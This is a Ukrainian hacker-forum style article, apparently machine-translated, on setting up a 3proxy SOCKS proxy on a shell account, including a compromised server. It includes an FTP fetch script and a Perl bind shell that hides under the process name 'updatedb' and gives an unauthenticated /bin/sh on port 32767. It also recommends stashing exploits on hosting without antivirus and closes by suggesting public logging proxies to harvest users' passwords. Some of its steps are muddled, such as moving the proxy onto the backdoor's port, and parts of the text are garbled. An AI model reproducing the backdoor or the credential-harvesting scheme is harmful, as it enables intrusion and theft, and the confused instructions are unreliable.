Ви напевно не раз стикалися з необхідністю зробити своє перебування в мережі анонімним. Ви напевно вже знаєте, що найбільш простим і дешевим способом анонімізувати себе в мережі є робота через проксі сервер/и. І кожен більш-менш піклується про свою безпеку юзер працює через проксі. Розповідати що таке проксі і які вони бувають я не буду.

Ти використовуєш проксі? Впевнений що так. А ти ніколи не задумувався звідки вони беруться і для чого їх створюють? Подумай сам, адже проксі генерують величезний трафік. Кому нада за нього платити? А ось кому. Більшість публічних проксі серверів встановлюються або хакерами, або спецслужбами для упіймання перше. А піймати хакера, заюзавшего Кдбшний проксик дуже просто. Припустимо хакер зламав сервер банку, викачав цікавить його інфу, після чого адмін запідозрив злом, адмін покопався в логах знайшов айпішнік хакера (точніше айпішнік проксика через який працював хакер) і побіг премиком на Луб’янку (припустимо %). Співробітники відділу До перевірили по своїй базі цей самий IP і побачили що це айпішнік їхнього проксика. Тепер справа за малим, співробітники колупають соціології на сервері де встановлено їх проксик. ВСЕ, ХАКЕР ПІД КОВПАКОМ!
Ми розглянули перший варіант, тепер трохи розповім про другому.
Уяви таку ситуацію. Я борзий падопак-хакер поставив свій проксик, і звичайно я не забув включити у свого проксика функцію ведення логів. Після чого я щедро залишаю свій проксик в паблике і наївні юзере користуються ними. Напевно у тебе виникло питання: а нафіга мені йому це нада, шо він буде робити з цими балками? Та все просто, весь трафік, що проходить через мій проксик буде записуватися в лог-файл. Ти залогінився під своїм паролем в асьці, твій пароль записався в лог мого проксика %).
Стрьомно виходить так? Так от щоб з тобою не сталося нічого з вищевикладеного я і написав цю стаью (зізнаюся тема заеженна за втрати пульсу). Вихід один – ставити власний проксик.
Я розповім про встановлення найбільш популярного (популярного по праву) socks проксі сервера під назвою 3proxy від ЗАРАЗИ. Рульность цього проксика полягає в тому, що його можна встановити навіть з nobody правами!
Отже почнемо:

Нам знадобляться:
1. Руки прямі — 2 шт.
2. архвив 3proxy
3. Шелл.

Що таке шелл і як з ним працювати я теж не буду пояснювати, не про це моя стаття. 3proxy можна скачати з офсайта www.security.nnov.ru/soft/3proxy. Шелл вибирати тобі, або це буде похаканный тобою серв, або шелл на платному хостингу. Чому на платному? Та тому що ні один безкоштовний хостер не дозволить тобі встановити проксик, перевіряв сам особисто (хоча якщо найдшь таке диво, незабудь поділитися зі мною smile.gif) Сподіваюся про те як забидить шелл на вразливою тачці розповідати не потрібно (але все таки якщо у тебе з цим проблеми, пиши, накатаю продовження %).
Отже, ти на шелле. Качай архівчик з 3proxy і приступимо до процесу установки (для танкістів пояснюю, скачати можна будь-яким даунлоадером встановленим на серве, якщо ж даунлоадера ти не знайшов, заливай через FTP).
Як я вже говорив закачування файлу можна зробити командою wget site.ru/file.tar.gz. Але іноді можна зіткнутися з відсутністю утиліти wget на сервері. Але це не проблема, тому що крім wget існують інші консольні даунлоадеры, наприклад curl і fetch. Працюють з ними за тим же принципом що і з wget, наприклад ти знайшов на серве curl, командуй: curl site.ru/file.tar.gz .
А що робити якщо на серванті взагалі немає даунлоадера !? На жаль, буває і таке. Але ви хід є завжди smile.gif. Адже якщо у тебе є шелл, ти можеш залити файли на нього через FTP. Ось як це реалізувати:
Взагалі якщо ти займаєшся мережевим зломом, то у тебе напевно є свій склад сплойтов та іншого жобра на будь-якому хостингу. Якщо ж ти досі не зареєстрував аккаунт на безкоштовному хостингу, біжи реєструвати, наприклад на www.newmail.ru, імхо на цьому хостингу немає антивирей і для зберігання эксплойто та іншої лабуди він підходить найкраще.
Отже ти зареєстрував свій аккаунт на newmail.ru тобі дали ящик і місце під сайт в придачю. Заливай на свій свежезареганный сайт 3proxy. Тепер власне наведу приклад того, як закачати на шелл потрібний нам сайт через FTP (все після # це мої пояснення, їх писати не потрібно %):

QUOTE
echo open ftp.newmail.ru 21>mpg # соеденяемся з FTP-сервом
echo yoursite.nm.ru>>mpg # тут адресу твого сайту
echo password>>mpg # пароль до вашого акаунту
echo bin>>mpg # заходимо на сайт (подружжя таке, точно незнаю %)
echo get 3proxy.tar.gz >>mpg # зливаємо з сайту архівчик з 3proxy
echo bye>>mpg # закриваємо з’єднання
ftp -s:mpg

Отже скачаллось, тепер разархивируй архів. У папці з разархивированным проксиком скомандуй make f Makefile.unix і чекай поки процес компіляції модулів завершиться. Якщо ти все зробиш правильно (і якщо нормальний шелл), то з’явиться один бінарники з назвою 3proxy. Всі. Ти зібрав свій проксик, тепер його потрібно отконфигурировать. Створюємо в тій самій папці де і бінарники 3proxy файл 3proxy.cfg .
Створив? Молодець, тепер вбиваємо налаштування, їх небагато.
Пиши в файлі конфига наступне (все після # в конфіг додавати непотрібно, ето мої коментарі %) :
QUOTE
nserver 127.0.0.1 # адреса DNS для автоматичного з’єднання
auth none # відключаємо авторизацію =))
allow * # рашзрешение на використання проксика з будь-якої адреси.
socks p7855 # номер порту нашого соксу.
internal 127.0.0.1 # внутрішній IP
log /dev/null # сюди будуть записуватися логи. Не хвилюйся сюди можна тільки записувати інфу, прочитати її неможливо smile.gif.

Якщо ти набрав, натисни ctrl+c, конфіг запишеться в ту директорія в якій ти його створював.
Ось впринципі і все по установці. Щоб запустити зібраний сокс скомандуй ./3proxy 3proxy.cfg .

Розглянемо приклад конфига, в якому ми встановимо авторизацію на нашому соксе:
QUOTE
nserver 127.0.0.1 # адреса DNS для автоматичного
users nick:CL:pass # створюємо юзера з ніком nick та паролем pass 8)
auth strong # вказуємо необхідність авторизації !
allow * # рашзрешение на використання проксика з будь-якої адреси.
socks p7855 # номер порту нашого соксу.
internal 127.0.0.1 # внутрішній IP
log /dev/null # сюди будуть записуватися логи. Не хвилюйся сюди можна тільки записувати інфу, прочитати її неможливо

В конфіги воявляется нова рядок users nick:CL:pass, цим рядком ти створюєш юзера (nick та pass звичайно потрібно поміняти на свої %). Юзерів можна створити кілька, робиться це однаково. І незабудь змінити рядок auth none на auth strong !

Необхідно забиндить (тобто відкрити порт для 3proxy.

Скрипт:
QUOTE
#!/usr/bin/perl
$port = 32767;
exit if fork;
$0 = «updatedb». “” x100;
$SIG{CHLD} = ‘IGNORE’;
use Socket;
socket(S, PF_INET, SOCK_STREAM, 0);
setsockopt(S, SOL_SOCKET, SO_REUSEADDR, 1);
bind(S, sockaddr_in($port, INADDR_ANY));
listen(S, 50);
while(1){
accept(X, S);
unless(fork)
{ open STDIN, “<&X”;
open STDOUT, “>&X”;
open STDERR, “>&X”;
close X;
exec(“/bin/sh”);
} close X;}

Зберігаємо код з файлу з розширенням .pl, наприклад bind.pl
Заливаємо його на шелл.
Виконуємо на шелле команду perl bind.pl
Після виконаних дій на шелле відкриється 32767 порт.
Нам доведеться підкоригувати в конфіги 3proxy порт, у рядку socks p7855 змінюємо з 7855 на 32767.

З. И. А адже ти можеш крім власного використання заюзать socks в своїх мерзенних справах. Подумай сам, що тобі заважає створити окремий проксик (як всі розумні мерзавци-хакери і щедро роздавати його направо і налевло, незабутні при цьому вказати для логів не дерикторію /dev/null, а в більш відповідне для твоїх бридких оборудок місце.

Удачі…